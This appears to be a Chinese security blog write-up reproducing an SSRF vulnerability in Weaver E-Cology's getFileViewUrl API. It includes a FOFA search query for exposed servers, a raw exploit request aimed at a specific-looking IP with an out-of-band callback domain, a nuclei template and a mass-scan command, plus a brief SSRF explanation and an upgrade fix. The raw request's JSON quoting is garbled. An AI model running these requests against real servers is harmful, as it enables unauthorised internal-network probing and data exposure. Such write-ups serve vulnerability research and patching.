泛微E-Cology getFileViewUrl 接口-SSRF漏洞复现

漏洞描述:

泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。

泛微E-Cology getFileViewUrl 接口处存在服务器请求伪造漏洞,未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口,获取服务的banner信息,窥探网络结构,甚至对内网或本地运行的应用程序发起攻击,获取服务器内部敏感配置,造成信息泄露。

本地复现

E-cology9

运维平台部署可参照 https://www.weaver.com.cn/cs/monitorDownload.html

Fofa

1
app="泛微-OA(e-cology)"

Poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /api/doc/mobile/fileview/getFileViewUrl HTTP/1.1
Host: 1.13.194.197:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36223.75.121.201:8088
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Upgrade-Insecure-Requests: 1

{
""file_id"": ""1000"",
""file_name"": ""c"",
""download_url"":"10ad5e3a36.ipv6.1433.eu.org."
}

·nuclei poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
id: weaver-ecology-getfileviewurl-ssrf

info:
name: 泛微E-Cology SSRF
severity: high
description: |
泛微E-Cology getFileViewUrl 接口存在ssrf
metadata:
fofa-query: 'app="泛微-OA(e-cology)"'
tags: ssrf, weaver, ecology

http:
- raw:
- |
POST /api/doc/mobile/fileview/getFileViewUrl HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{
"file_id": "1000",
"file_name": "c",
"download_url": "http://{{interactsh-url}}"
}

matchers:
- type: word
part: interactsh_protocol
words:
- "dns"

注解:

interactshhttps://app.interactsh.com/#/

Exp

1

![image-20240813160531959](泛微E-Cology getFileViewUrl 接口-SSRF漏洞复现.assets/image-20240813160531959-17235363337851.png)

Nuclei

1
sudo nuclei -l host.txt -t fv1.yaml

漏洞分析

SSRF原理回顾

SSRF(Server-Side Request Forgery,服务器端请求伪造)

SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制

比如从指定URL地址获取网页文本内容,加载指定地址的图片,文档等等。SSRF漏洞通过篡改获取资源的请求发送给服务器(服务器并没有检测这个请求是否合法的),然后服务器以他的身份来访问服务器的其他资源。

SSRF利用存在缺陷的Web应用作为代理攻击远程和本地的服务器。

泛微E-Cology getFileViewUrl 接口-SSRF漏洞

1
/api/doc/mobile/fileview/getFileViewUrl  

public string getFileViewUrl()

修复方案

升级至最新版本

总结

探究路线:image-20240801130417627

其他链接:

  1. SSRF的利用
  2. 反弹shell
  3. dnslog https://dig.pm/
  4. 隐藏ip